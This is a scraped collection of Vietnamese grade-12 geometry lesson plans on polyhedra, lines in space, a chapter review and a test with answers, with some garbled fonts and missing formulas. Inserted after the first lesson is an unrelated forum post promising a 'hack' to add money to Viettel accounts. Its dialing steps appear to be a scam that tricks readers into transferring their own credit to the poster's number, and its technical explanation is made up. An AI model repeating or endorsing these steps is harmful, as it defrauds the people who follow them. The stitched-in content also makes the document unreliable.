Giáo án Lớp 12 môn học Hình học - Chương I: Khối đa diện

Giáo án Lớp 12 môn học Hình học - Chương I: Khối đa diện

1. Về kiến thức: Học sinh nắm được : khái niệm khối lăng trụ và khối chóp, khái niệm về hình đa diện và khối đa diện, hai đa diện bằng nhau, phân chia và lắp ghép các khối đa diện.

2. ề kĩ năng: HS nhận biết khái niệm khối lăng trụ và khối chóp, khái niệm về hình đa diện và khối đa diện, hai đa diện bằng nhau, biết cách phân chia và lắp ghép các khối đa diện.

3. Về tư duy: Biết qui lạ về quen, tư duy các vấn đề của toán học một cách logic và hệ thống.

4. Về thái độ: Cẩn thận chính xác trong lập luận và trong vẽ hình.

II. PHƯƠNG PHÁP,

1. Phương pháp: Thuyết trình, gợi mở, vấn đáp, nêu vấn đề

2. Công tác chuẩn bị:

 

doc 36 trang Người đăng haha99 Lượt xem 907Lượt tải 0 Download
Bạn đang xem 20 trang mẫu của tài liệu "Giáo án Lớp 12 môn học Hình học - Chương I: Khối đa diện", để tải tài liệu gốc về máy bạn click vào nút DOWNLOAD ở trên
Số tiết: 2 tiết	Thực hiện ngày 23 Tháng 8 năm 2009
Chương I: KHỐI ĐA DIỆN.
§1:KHÁI NIỆM VỀ KHỐI ĐA DIỆN.
Mục tiêu
Về kiến thức: Học sinh nắm được : khái niệm khối lăng trụ và khối chóp, khái niệm về hình đa diện và khối đa diện, hai đa diện bằng nhau, phân chia và lắp ghép các khối đa diện.
ề kĩ năng: HS nhận biết khái niệm khối lăng trụ và khối chóp, khái niệm về hình đa diện và khối đa diện, hai đa diện bằng nhau, biết cách phân chia và lắp ghép các khối đa diện.
Về tư duy: Biết qui lạ về quen, tư duy các vấn đề của toán học một cách logic và hệ thống. 
Về thái độ: Cẩn thận chính xác trong lập luận và trong vẽ hình.
PHƯƠNG PHÁP, 
Phương pháp: Thuyết trình, gợi mở, vấn đáp, nêu vấn đề
Công tác chuẩn bị:
Giáo viên: giáo án, sgk, thước kẻ, phấn, 
Học sinh: Sgk, vở ghi, dụng cụ học tập, 
TIẾN TRÌNH BÀI HỌC
Ổn định lớp: 1 phút
Kiêm tra bài cũ: ( 4 phút )
NỘI DUNG
HOẠT DỘNG CỦA GV
HOẠT ĐỘNG CỦA HS
TG
I. KHỐI LĂNG TRỤ VÀ KHỐI CHÓP.
Khối lăng trụ là phần không gian được giới hạn bởi một hình lăng trụ, kể cả hình lăng trụ đó.
Khối chóp là phần không gian được giới hạn bởi một hình chóp, kể cả hình đa chóp đó.
Khối chóp cụt là phần không gian được giới hạn bởi một hình chóp, kể cả hình chóp cụt đó.
II. KHÁI NIỆM VỀ HÌNH ĐA DIỆN VÀ KHỐI ĐA DIỆN.
Khái niệm về hình đa diện:
 “ Hình ña dieän laø hình goàm coù moät soá höõu haïn mieàn ña giaùc thoaû maõn hai tính chaát:
 a) Hai ña giaùc phân biệt chỉ có thể hoaëc khoâng coù ñieåm chung hoaëc chỉ coù moät ñænh chung, hoaëc chỉ coù moät caïnh chung.
 b) Moãi caïnh cuûa ña giaùc naøo cuõng laø caïnh chung cuûa ñuùng hai ña giaùc.”
 Một cách tổng quát, hình đa diện (gọi tắt là đa diện) là hình được tạo bởi một số hữu hạn các đa giác thoả mãn hai tính chất trên.
Hình 1.5
2. Khái niệm về khối đa diện:
 Khối đa diện là phần không gian được giới hạn bởi một hình đa diện, kể cả hình đa diện đó.
III. HAI ĐA DIỆN BẰNG NHAU. 
 1. Phép dời hình trong không gian:
 Gv giới thiệu với Hs khái niệm sau:
 “Trong không gian, quy tắc đặt tương ứng mỗi điểm M và điểm M’ xác định duy nhất được gọi là một phép biến hình trong không gian.
 Phép biến hình trong không gian được gọi là phép dời hình nếu nó bảo toàn khoảng cách giữa hai điểm tuỳ ý”
Các phép dời hình thường gặp:
+ Phép tịnh tiến
+ Phép đối xứng qua mặt phẳng
+ Phép đối xứng tâm O
+ Phép đối xứng qua đường thẳng 
*Nhận xét:
+ Thực hiện liên tiếp các phép dời hình sẽ được một phép dời hình.
+ Phép dời hình biến đa diện (H) thành đa diện (H’), biến đỉnh, cạnh, mặt của (H) thành đỉnh, cạnh, mặt tương ứng của (H’)
2. Hai hình bằng nhau:
 + Hai hình được gọi là bằng nhau nếu có một phép dời hình biến hình này thành hình kia.
 + Hai đa diện được gọi là bằng nhau nếu có một phép dời hình biến đa diện này thành đa diện kia.
IV. PHÂN CHIA VÀ LẮP GHÉP CÁC KHỐI ĐA DIỆN.
Nếu khối đa diện (H) là hợp của hai khối đa diện (H1) và (H2) sao cho (H1) và (H2) không có chung điểm trong nào thì ta nói có thể chia khối đa diện (H) thành hai khối đa diện (H1) và (H2), hay có thể lắp ghép hai khối đa diện (H1) và (H2) với nhau để được khối đa diện (H). 
 Hoạt động 1:
 Em hãy nhắc lại định nghĩa hình lăng trụ và hình chóp.
 Gv giới thiệu với Hs khái niệm về khối lăng trụ, khối chóp, khối chóp cụt, tên gọi, các khái niệm về đỉnh, cạnh, mặt, mặt bên, mặt đáy, cạnh bên, cạnh đáy của khối chóp, khối chóp cụt, khối lăng trụ cho Hs hiểu các khái niệm này. 
 Gv giới thiệu với Hs vd (SGK, trang 5) để Hs củng cố khái niệm trên)
 Hoạt động 2:
 Em hãy kể tên các mặt của hình lăng trụ ABCDE.A’B’C’D’E’. (Hình 1.4, SGK, trang 5)
 Qua hoạt động trên, Gv giới thiệu cho Hs khái niệm sau:
 Gv chỉ cho Hs biết được các đỉnh, cạnh, mặt của hình đa diện 1.5.
 Gv giới thiệu cho Hs biết được các khái niệm: điểm ngoài, điểm trong, miền ngoài, miền trong của khối đa diện thông qua mô hình.
 Gv giới thiệu với Hs vd (SGK, trang 7) để Hs hiểu rõ khái niệm trên.
Hoạt động 3:
 Cho hình hộp ABCD.A’B’C’D’. Chứng minh rằng hai lăng trụ ABD.A’B’D’ và BCD.B’C’D’ bằng nhau.
 Gv giới thiệu với Hs vd (SGK, trang 11) để Hs biết cách phân chia và lắp ghép các khối đa diện.
-nhắc lại định nghĩa hình lăng trụ và hình chóp.
-theo dõi, vẽ hình và ghi chép
- đứng tại chỗ đọc tên
-theo dõi, vẽ hình và ghi chép
-theo dõi, vẽ hình và ghi chép
Suy nghĩ chứng minh
20’
20’
20’
20’
 Củng cố: ( 5’) Gv nhắc lại các khái niệm và quy tắc trong bài để Hs khắc sâu kiến thức.
 Bài tập: Bài 1..4, SGK, trang 12	Bmt, Ngày 20 tháng 8 năm 2009
THÔNG QUA TỔ BỘ MÔN	 GIÁO VIÊN SOẠN GIẢNG
[HACK] BẢN HACK MỚI NHẤT LẤY TIỀN MẠNG VIETEL ĐÂY .(BẢN CẬP NHẬT 30/06)
Xin được chia sẻ cùng các bạn một thủ thuật dùng mã hack mà tôi vừa mới khám phá:như các bạn cũng đã thấy,rất nhiều các cá nhân post bài lên các diễn đàn trong nuớc với nội dung ”hack tiền của mạng Viettel”để tìm được những topic như thế không hề khó. Ở đây tôi xin đưa ra một vài ví dụ: 
và còn rất nhiều những topic như vậy,nhưng hầu hết là của AMATEUR HACKER,chủ yếu nhằm vào mục đích vụ lợi chứ không thông thạo về chuyên môn, họ thiếu kinh nghiệm ,kiến thức và cả tính chính xác trong lĩnh vực Hack bậc thầy này,mà nó đòi hỏi phài có một trình độ Hack tương đối cao .Chính vì những lí do nêu trên và với nhiều năm kinh nghiệm của mình,tôi xin giới thiệu : Tôi :
Họ tên: xucxactinhyeu
Nghề nghiệp : hacker
Tôi không dám nhận mình là một sinh viên ưu tú,nhưng với những gì mà mình tự khám phá được thì tôi thấy rất hài lòng.Chắc các bạn cũng biết tới diễn đàn HAVonline – diễn đàn hacker lớn nhất hiện nay và tôi rất tự hào khi mình nằm trong ban quản trị diễn đàn.Với những kinh nghiệm mà tôi đã có ,hôm nay tôi xin giới thiệu với các bạn cách hack tiền tài khoản Viettel hoàn toàn chính xác.Do thời gian có hạn nên tôi nói ngắn gọn như sau:
Các bạn chỉ cần thực hiện tuần tự và chính xác theo yêu cầu của 6 bước sau:
1 -Một sim Viettel hoạt động trên 230 ngày(hon 7 tháng).Tại sao phải cần vậy?Vì chỉ có những sim hoạt dộng trên 7 tháng mới được Viettel đưa vào mã bảo vệ tài khoản chuyển tiền ( 6 tháng chưa được đâu các bạn) trên server Viettel quản lí.
2 -Rất đơn giản : Soạn tin MK gửi tới 136 để lấy mât khẩu chuyển tiền của bạn( nếu bạn chưa có).Tại sao phải cần vậy ? Vì chúng ta hack thông qua dịch vụ I-Share của Viettel.
3 -Ðổi mật khẩu chuyển tiền: các bạn gọi tới 900 ,nhánh phím số 3 và làm theo hướng dẫn..và điều quan trọng nằm ở bước này. Các bạn phải đổi mât khẩu chuyển tiền thành dãy số sau :10010010 ,đó chính là mật khẩu Server trung gian ở bước 5. Tại sao phải làm vậy?Vì khi các bạn chuyển mật khẩu thành dãy số trên tức là đã mã hóa tài khoản của bạn trên Server mà Viettel quản lý.Ðiều này rất quan trọng.
4 -Tài khoản trong sim của bạn phải có nhiều hơn 31999 vnd
5 -Các bạn làm theo cú pháp nhu sau: *136* mật khẩu Server *mã PIN *mã PUK#. Để khỏi mất thời gian của các bạn tìm lại 2 mã trên nên tôi đã tạo ra một Server trung gian ( viết tắt là TIS-Telephone of Intermediacy Server) với mã PIN và mã PUK mặc định (dùng đăng nhập sdt của bạn trên Server),tóm lại, cụ thể các thông số như sau (chỉ áp dụng cho mạng Viettel):
+ mật khẩu Server: 10010010
+ mã PIN : 841682455083
+ mã PUK: 28000
Các bạn chỉ cần nhập chính xác 3 dãy số trên vào cú pháp và nhấn nút gọi thì hệ thống sẽ tự động đăng nhập sdt của bạn vào TIS (Telephone of Intermediacy Server) mà tôi tạo ra và tài khoản của sdt người gửi sẽ tự đông được công thêm tiền hack được sau khi đăng nhập (tiền hack được sẽ công thêm vào tài khoản chính),thật ra đây là một trong những cách hack tài khoản điện thoại mà các Hacker chuyên nghiệp trên thế giới gần đây mới sử dụng ( nguyên lý là dùng mã hack đảo chiều các dịch vụ chuyển tiền từ các Server di đông,chẳng hạn như I-Share, hiên trên mạng có nhiều tài liệu tiếng Anh nói về vấn đề này).
6- Sau khi làm xong những bước trên : các bạn chỉ cần đợi 15 phút , sẽ có tin nhắn trả lời và tài khoản chính của các bạn đã được cộng thêm 200000 vnd.( lưu ý 200000vnd sẽ được cộng trực tiếp vào tài khoản chính của bạn)
+Tôi hack được tài khoản của mạng di động viettel từ 1 lỗ hổng nhỏ trên I-Share và những lần tôi test gần đây đều thành công.Thông báo sevsr trung gian ma tôi tao ra cũng là sevsr duy nhất hoạt động có hiệu quả hiện nay).
Tất cả chỉ có vậy nhưng đó chính là công sức bao lâu nay tôi khám phá.Các bạn hãy thử và cho tôi biết kết quả nếu như bản hack hoạt động tốt tôi sẽ mở thêm nhiều sever khác.
Các Bạn tranh thủ đi kẻo viettel sửa lỗi đó
Nếu bạn làm lần đâù mà không được thì hãy làm đi làm lại vài lần, chắc chắn sẽ thành công
LUYỆN TẬP VỀ KHÁI NIỆM VỀ KHỐI ĐA DIỆN.
Mục tiêu
Về kiến thức: Học sinh nắm được : khái niệm khối lăng trụ và khối chóp, khái niệm về hình đa diện và khối đa diện, hai đa diện bằng nhau, phân chia và lắp ghép các khối đa diện.
Về kĩ năng: HS nhận biết khái niệm khối lăng trụ và khối chóp, khái niệm về hình đa diện và khối đa diện, hai đa diện bằng nhau, biết cách phân chia và lắp ghép các khối đa diện.Vận dụng được kiến thứcđã học vào làm bài tập sgk
Về tư duy: Biết qui lạ về quen, tư duy các vấn đề của toán học một cách logic và hệ thống. 
Về thái độ: Cẩn thận chính xác trong lập luận và trong vẽ hình.
PHƯƠNG PHÁP, 
Phương pháp: Thuyết trình, gợi mở, vấn đáp, nêu vấn đề
Công tác chuẩn bị:Giáo viên: giáo án, sgk, thước kẻ, phấn, Học sinh: Sgk, vở ghi, dụng cụ học tập, 
TIẾN TRÌNH BÀI HỌC
Ổn định lớp: 1 phút
Kiêm tra bài cũ: ( 2 phút )
NỘI DUNG
HOẠT DỘNG CỦA GV
HOẠT ĐỘNG CỦA HS
TG
Bài 1: Chứng minh rằng một đa diện có các mặt là các tam giác thì tổng số mặt của nó phải là một số chẵn. Cho ví dụ
Bài 2: Chứng minh rằng một đa diện mà mỗi đỉnh của nó là đỉnh chung của một số lẻ mặt thì tổng số các đỉnh của nó phải là một số chẳn
_
D'
_
C'
_
B'
_
A'
_
D
_
C
_
B
_
A
Bài 3: Chia khối lập phương thành 5 khối tứ diện
Bài 4: sgk
 Giáo viên phân tích : Gọi số mặt của đa diện là M. Vì mỗi mặt có 3 cạnh nên lẽ ra cạnh của nó là 3M. Vì mỗi cạnh là cạnh chung cho hai mặt nên số cạnh C của đa diện là C=3M/2 . Vì C là số nguyên nên 3M phải chia hết cho 2, mà 3 không chia hết cho 2 nên M phải chia hết cho 2 => M là số chẳn.
Ví dụ : như hình vẽ bên
Giáo viên phân tích : Gọi Đ là số đỉnh của đa diện và mỗi đỉnh của nó là một số lẻ (2n+1) mặt thì số mặt của nó là (2n+1)Đ.
Vì mỗi cạnh chung cho hai mặt, nên số cạnh của đa diện là C =(2n+1)Đ/2
Vì C là số nguyên nên (2n+1)Đ phải chia hết cho 2, mà (2n+1) lẻ không chia hết cho 2 nên Đ phải chia hết cho 2 => Đ là số chẳn.
Gợi ý: Ta có thể chia thành năm khối tứ diện sau: AB’CD’,
A’AB’D’,C’B’CD’,BACB’, DACD’
- GV mô tả hình vẽ bài 4
HS theo dõi và làm bài tập
HS theo dõi và làm bài tập
HS suy nghĩ vẽ hình
HS theo dõi và vẽ hình
10’
10’
10’
10’
 Củng cố: ( 2’) Gv nhắc lại các khái niệm và quy tắc trong bài để Hs khắc sâu kiến thức.
 Bài tập: Bài 1..4, SGK, trang 12	Bmt, Ngày 20 tháng 8 năm 2009
THÔNG QUA TỔ BỘ MÔN	 GIÁO VIÊN SOẠN GIẢNG
Bài 2: KHỐI ĐA DIỆN LỒI VÀ KHỐI ĐA DIỆN ĐỀU
Mục tiêu
Về kiến thức: Học sinh nắm được : khái niệm về khối đa diệnlồi và khối đa diện đều, nhận biết năm loại khối đa diện đều.
Về kĩ năng: nhận biết được khối đa diện lồi và khối đa  ... t nhau, chéo nhau.
Kỹ năng
 + Biết viết phương trình tham số của đường thẳng.
 + Biết xét vị trí tương đối của hai đường thẳng.
 + Biết giải một số bài toán liên quan đến đường thẳng và mp (tính khoảng cách giữa đường thẳng và mp, tìm hình chiếu của một điểm trên mp, tìm điểm đối xứng qua đường thẳng)
Tư duy-Thái độ 
 - Thaùi ñoä: tích cực xây dựng bài, chủ động chiếm lĩnh kiến thức theo sự hướng dẫn của Gv, năng động, sáng tạo trong quá trình tiếp cận tri thức mới, thấy được lợi ích của toán học trong đời sống, từ đó hình thành niềm say mê khoa học, và có những đóng góp sau này cho xã hội.
 - Tö duy: hình thành tư duy logic, lập luận chặt chẽ, và linh hoạt trong quá trình suy nghĩ.
II.PHƯƠNG PHÁP, CHUẨN BỊ:
-phương pháp: Thuyết trình, gợi mở, vấn đáp, nêu vấn đề
-Công tác chuẩn bị:Giáo viên: giáo án, sgk, thước kẻ, phấn, Học sinh: Sgk, vở ghi, dụng cụ học tập, 
III.TIẾN TRÌNH BÀI HỌC
Ổn định lớp: 3 phút 
Bài mới:
NỘI DUNG
HOẠT DỘNG CỦA GV
HOẠT ĐỘNG CỦA HS
TG
I. PHƯƠNG TRÌNH THAM SỐ CỦA ĐƯỜNG THẲNG:
“Trong không gian Oxyz cho đường thẳng D đi qua điểm M0(x0; y0; z0) và nhận = (a1; a2; a3) làm vector chỉ phương. Điều kiện cần và đủ để điểm M(x; y; z) nằm trên D là có một số thực sao cho:”
“Phương trình tham số của đường thẳng D đi qua điểm M0(x0; y0; z0) và có vector chỉ phương 
= (a1; a2; a3) là phương trình có dạng:
 (t là tham số)
 Ngoài ra, dạng chính tắc của D là:
 II. ĐIỀU KIỆN ĐỂ HAI ĐƯỜNG THẲNG SONG SONG, CẮT NHAU, CHÉO NHAU.
 Trong không gian cho hai đường thẳng có phương trình tham số:
d: có vtcp = (a1; a2; a3) 
d’: có vtcp ’= (a’1;a’2; a’3) 
1. Điều kiện để hai đường thẳng song song:
2. Điều kiện để hai đường thẳng cắt nhau:
 Hai đường thẳng d và d’ cắt nhau khi và chỉ khi hệ phương trình ẩn t, t’ sau có đúng 1 nghiệm:
* Chú ý:
 Sau khi tìm được cặp nghiệm (t; t’), để tìm toạ độ giao điểm M của d và d’ ta thế t vào phương trình tham số của d (hay thế t’ vào phương trình tham số của d’)
3. Điều kiện để hai đường thẳng chéo nhau:
 Hai đường thẳng d và d’ chéo nhau khi và chỉ khi và ’ không cùng phương và hệ phương trình sau vô nghiệm:
 a/ d:b/ d: 
Hoạt động 1:
 Trong không gian Oxyz cho điểm M0(1; 2; 3) và hai điểm M1(1 + t; 2 + t; 3 + t), M2(1 +2t ; 2 + 2t ; 3 + 2t) di động với tham số t. Em hãy chứng tỏ ba điểm M0, M1, M2 luôn thẳng hàng.
Gv giới thiệu với Hs nội dung định lý sau:
- Gv giới thiệu với Hs phần chứng minh (SGK, trang 83) để Hs hiểu rõ nội dung định lý vừa nêu.
 Từ đó đi đến định nghĩa sau: 
 Gv giới thiệu với Hs vd 1, 2, 3 (SGK, trang 83, 84) để Hs hiểu rõ nội dung định nghĩa vừa nêu và biết cách viết phương trình tham số của đường thẳmg.
Hoạt động 2:
 Cho đường thẳng có phương trình tham số:
Em hãy tìm toạ độ của điểm M trên D và toạ độ một vector chỉ phương của D.
Hoạt động 3:
 Cho hai đường thẳng d và d’ lần lượt có phương trình tham số là:
d: ; d’: 
a/ Em hãy chứng tỏ điểm M(1; 2; 3) là điểm chung của d và d’.
b/ Em hãy chứng tỏ d và d’ có hai vector chỉ phương không cùng phương.
 Gv giới thiệu với Hs vd 1 (SGK, trang 85) để Hs hiểu rõ điều kiện song song của hai đường thẳng.
 Hoạt động 4:
 Em hãy chứng minh hai đường thẳng sau trùng nhau:
d: và d’: 
Gv giới thiệu với Hs vd 2 (SGK, trang 86) để Hs hiểu rõ điều kiện cắt nhau của hai đường thẳng. Đồng thời biết tìm giao điểm giao điểm của chúng 
Gv giới thiệu với Hs vd 3, 4 (SGK, trang 86) để Hs hiểu rõ điều kiện chéo nhau của hai đường thẳng. Đồng thời biết chứng minh hai đường thẳng chéo nhau.
Hoạt động 5:
 Em hãy tìm số giao điểm của mặt phẳng 
(a): x + y + z – 3 = 0 với đường thẳng d trong các trường hợp sau:
Hs suy nghĩ chứng minh
Hs theo dõi và ghi chép
Hs theo dõi và ghi chép
Hs suy nghĩ làm ví dụ
Hs suy nghĩ trả lời
Hs suy nghĩ làm bài
Hs suy nghĩ làm ví dụ
Hs suy nghĩ chứng minh
Hs suy nghĩ làm ví dụ
Hs suy nghĩ làm ví dụ
Hs suy nghĩ làm làm bài
42’
42’
Củng cố: ( 3’) Củng cố lại các kiến thức đã học trong bài .
	 	 Bmt, Ngày 14 tháng 2 năm 2010
THÔNG QUA TỔ BỘ MÔN	 	 GIÁO VIÊN SOẠN GIẢNG 
----------------------------------------------------------------------------------------------------------------------------------------
Số tiết: 2 tiết	Thực hiện ngày 25 Tháng 2 năm 2010
LUYỆN TẬP VỀ PHƯƠNG TRÌNH ĐƯỜNG THẲNG TRONG KHÔNG GIAN.
I. MỤC TIÊU
Kiến thức: Hs nắm được phương trình tham số của đường thẳng, điều kiện để hai đường thẳng song song, cắt nhau, chéo nhau.
Kỹ năng
 + Biết viết phương trình tham số của đường thẳng.
 + Biết xét vị trí tương đối của hai đường thẳng.
 + Biết giải một số bài toán liên quan đến đường thẳng và mp (tính khoảng cách giữa đường thẳng và mp, tìm hình chiếu của một điểm trên mp, tìm điểm đối xứng qua đường thẳng)
Tư duy-Thái độ 
 - Thaùi ñoä: tích cực xây dựng bài, chủ động chiếm lĩnh kiến thức theo sự hướng dẫn của Gv, năng động, sáng tạo trong quá trình tiếp cận tri thức mới, thấy được lợi ích của toán học trong đời sống, từ đó hình thành niềm say mê khoa học, và có những đóng góp sau này cho xã hội.
 - Tö duy: hình thành tư duy logic, lập luận chặt chẽ, và linh hoạt trong quá trình suy nghĩ.
II.PHƯƠNG PHÁP, CHUẨN BỊ:
-phương pháp: Thuyết trình, gợi mở, vấn đáp, nêu vấn đề
-Công tác chuẩn bị:Giáo viên: giáo án, sgk, thước kẻ, phấn, Học sinh: Sgk, vở ghi, dụng cụ học tập, 
III.TIẾN TRÌNH BÀI HỌC
Ổn định lớp: 3 phút 
Bài mới:
NỘI DUNG
HOẠT DỘNG CỦA GV
HOẠT ĐỘNG CỦA HS
TG
Bài 1: Viết phương trình tham số của đường thẳng d trong mỗi trường hợp sau:
a/ Đi qua M(5;4;1) và có vectơ chỉ phương =(2;-3;1)
b/ b/ Đi qua A(2;-1;3) và vuông góc với mặt phẳng () có phương trình :
 x + y – z +5 = 0
c/ Đi qua điểm B(2;0;-3) và song song với đường thẳng :
d/ Đi qua hai điểm P(1;2;3 ) và Q(5;4;4)
Bài 2: Viết phương trình tham số của đường thẳng là hình chiếu vuông góc của đường thẳng d: lần lượt trên các mặt phẳng:
a/ (Oxy)
b/ (Oyz)
Bài 3: Xét vị trí tương đối của các cặp đường thẳng d và d’ cho bởi các phương trình sau:
a/ d: d’:
b/ sgk
Bài 4:Tìm a để hai đường thẳng sau cắt nhau:
d: d’:
Bài 5:sgk
Bài 6: Tính khoảng cách giữa đường thẳng : và mặt phẳng ():2x -2y + z + 3 =0
Bài7:Cho điểm A (1; 0 ; 0 )và đường thẳng ; 
a)Tìm toạ độ điểm H là hìng chiếu vuông góc của điểm A trên đường thẳng.
b)Tìm toạ độ điểm A’ đối xứngvới A qua đường thẳng .
Bài8:Cho điểm M(1; 4 ; 2) và mặt phẳng():x + y + z -1 = 0.
a) Tìm toạ độ điểm H là hình chiếu vuông góccủa điểm M trên mặt phẳng ()
b) Tìm toạ độ điểm M’ đối xứng với M qua mặt phẳng()
c) Tính khoảng cách từ điểm M đến mặt phẳng ()
Bài9 :Cho hai đường thẳng
d: d’:
chứng minh d và d’ chéo nhau.
1/Yêu cầu hs lên bảng trình bày
Đáp án
a/:b/
c/d/
2/Yêu cầu hs lên bảng trình bày
Đáp án:
a/ b/
3/Yêu cầu hs lên bảng trình bày
Đáp án:
a/ d cắt d’
b/ d // d’
4/Yêu cầu hs lên bảng trình bày
Đáp án:
a = 0
5/Yêu cầu hs lên bảng trình bày
Đáp án:
a/ 1 điểm chung
b/ 0 điểm chung
c/ vô số điểm chung
6/Yêu cầu hs lên bảng trình bày
Đáp án:
d(,()) = 2/3
7/Yêu cầu hs lên bảng trình bày
Đáp án:
a/H(3/2; 0; -1/2)
b/ A’(2; 0; -1 )
8/Yêu cầu hs lên bảng trình bày
Đáp án:
a/ H(-1; 2; 0)
b/ M(-3; 0; -2)
c/MH = 2
9/Yêu cầu hs lên bảng trình bày
Đáp án:
HS suy nghĩ lên bảng trình bày
HS suy nghĩ lên bảng trình bày
HS suy nghĩ lên bảng trình bày
HS suy nghĩ lên bảng trình bày
HS suy nghĩ lên bảng trình bày
HS suy nghĩ lên bảng trình bày
HS suy nghĩ lên bảng trình bày
HS suy nghĩ lên bảng trình bày
15’
10’
7’
7’
10’
5’
10’
10’
10’
Củng cố: ( 3’) Củng cố lại các kiến thức đã học trong bài .
	 	 Bmt, Ngày 22 tháng 2 năm 2010
THÔNG QUA TỔ BỘ MÔN	 	 GIÁO VIÊN SOẠN GIẢNG 
------------------------------------------------------------------------------------------------------------------------------------
Số tiết: 2 tiết	Thực hiện ngày 25 Tháng 2 năm 2010
ÔN TẬP CHƯƠNG III
I. MỤC TIÊU
I. Mụcđñích baøi dạy:
 - Kiến thức cơ bản: 
 + Toạ độ của điểm và của vector, biểu thức toạ độ của các phép toán vector, tích vô hướng, ứng dụng của tích vô hướng, phương trình mặt cầu.
 + Vector pháp tuyến của mặt phẳng, phương trình tổng quát của mặt phẳng, điều kiện để hai mặt phẳng song song, vuông góc, khoảng cách từ một điểm đến một mặt phẳng.
 + Phương trình tham số của đường thẳng, điều kiện để hai đường thẳng song song, cắt nhau, chéo nhau.
 - Kỹ năng: 
 + Biết tìm toạ độ của điểm và toạ độ của vector.
 + Biết tính toán các biểu thức toạ độ dựa trên các phép toán vector.
 + Biết tính tích vô hướng của hai vector.
 + Biết viết phương trình của mặt cầu khi biết tâm và bán kính.
 + Biết tìm toạ độ của vector pháp tuyến của mặt phẳng.
 + Biết viết phương trình tổng quát của mặt phẳng.
 + Biết chứng minh hai mặt phẳng song song, hai mặt phẳng vuông góc.
 + Biết tính khoảng cách từ một điểm đến một mặt phẳng.
 + Biết viết phương trình tham số của đường thẳng.
 + Biết xét vị trí tương đối của hai đường thẳng.
 + Biết giải một số bài toán liên quan đến đường thẳng và mp (tính khoảng cách giữa đường thẳng và mp, tìm hình chiếu của một điểm trên mp, tìm điểm đối xứng qua đường thẳng)
 - Thaùi ñoä: tích cực xây dựng bài, chủ động chiếm lĩnh kiến thức theo sự hướng dẫn của Gv, năng động, sáng tạo trong quá trình tiếp cận tri thức mới, thấy được lợi ích của toán học trong đời sống, từ đó hình thành niềm say mê khoa học, và có những đóng góp sau này cho xã hội.
 - Tö duy: hình thành tư duy logic, lập luận chặt chẽ, và linh hoạt trong quá trình suy nghĩ.
II. Phương phaùp: 
 - Thuyết trình, kết hợp thảo luận nhoùm vaø hỏi ñaùp.
 - Phöông tieän daïy hoïc: SGK. 
III. Nội dung vaø tiến trình leân lớp:
Ổn định: 2’
NỘI DUNG
HOẠT DỘNG CỦA GV
HOẠT ĐỘNG CỦA HS
TG
Bài tập: sgk
 Toå chöùc cho Hs thaûo luaän nhoùm giaûi quyeát caùc noäi dung trong phaàn oân taäp chöông.
 Phaàn lyù thuyeát, Gv coù theå goïi Hs nhaéc laïi caùc khaùi nieäm hay laäp phieáu ñeå Hs ñoïc SGK vaø ñieàn vaøo phieáu.
 Phaàn baøi taäp, Gv phaân coâng cho töøng nhoùm laøm vaø baùo caùo keát quaû ñeå Gv söûa cho Hs.
Hs laøm theo höôùng daãn cuûa Gv:
Thaûo luaän nhoùm ñeå giaûi baøi taäp.
85’
Củng cố: ( 3’) Củng cố lại các kiến thức đã học trong bài .
	 	 Bmt, Ngày 22 tháng 2 năm 2010
THÔNG QUA TỔ BỘ MÔN	 	 GIÁO VIÊN SOẠN GIẢNG 
-----------------------------------------------------------------------------------------------------------------------------------
KIỂM TRA KẾT THÚC CHƯƠNG III
Câu I ( 5,0 điểm ) : 
Trong không gian với hệ tọa độ Oxyz , cho 4 điểm A(2;1;1) ,B(0;2;1) ,C(0;3;0) ,
 D(1;0;1) .
 a. Viết phương trình đường thẳng BC .
 b. Chứng minh rằng 4 điểm A,B,C,D không đồng phẳng .
Câu II ( 5,0 điểm ) : 
 Trong không gian với hệ tọa độ Oxyz cho điểm M(1;1;1) , hai đường thẳng 
 , và mặt phẳng (P) : 
 a. Tìm điểm N là hình chiếu vuông góc của điểm M lên đường thẳng () .
 b. Viết phương trình đường thẳng cắt cả hai đường thẳng và nằm trong mặt 
 phẳng (P) .
Đáp án: 
Câu I:
a) 2,5đ (BC) : 
 b) 2,5đ Ta có : 
 không đồng phẳng 
Câu II:
a) 2,5đ Gọi mặt phẳng 
 Khi đó : 
 b) 2,5đ Gọi 
 Vậy 
---------------------------------------------------Hết------------------------------------------------------------------------------

Tài liệu đính kèm:

  • docGiao an Hinh hoc lop 12_Ban co ban.doc